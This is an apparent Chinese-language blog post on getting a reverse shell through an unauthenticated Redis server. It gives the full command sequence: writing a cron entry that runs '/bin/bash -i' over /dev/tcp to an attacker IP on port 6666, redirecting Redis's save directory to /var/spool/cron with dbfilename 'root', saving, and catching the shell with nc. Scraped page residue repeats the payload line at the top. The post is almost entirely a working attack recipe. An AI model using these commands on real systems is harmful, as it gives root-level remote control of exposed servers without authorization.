&/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n"config set dir /var/spool/cronconfig set dbf..." /> &/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n"config set dir /var/spool/cronconfig set dbf..." /> &/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n"config set dir /var/spool/cronconfig set dbf..." />
🌤️ 加载中...
#
Web安全与渗透 2018-05-29

Redis未授权访问反弹shell

By Jove 1 Views 1 MIN READ 0 Comments

1. redis-cli -h -p -a
2.一分钟反弹
set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/xxx.xxx.xxx.xxx/6666 0>&1\n\n"
config set dir /var/spool/cron
config set dbfilename root
save
3.nc 监听

本文由 Jove 原创

采用 CC BY-NC-SA 4.0 协议进行许可

转载请注明出处:https://www.jozxing.cc/index.php/archives/1397/

TAGS: 无标签

相关推荐

  • 暂无相关推荐,看看别的吧。

0 评论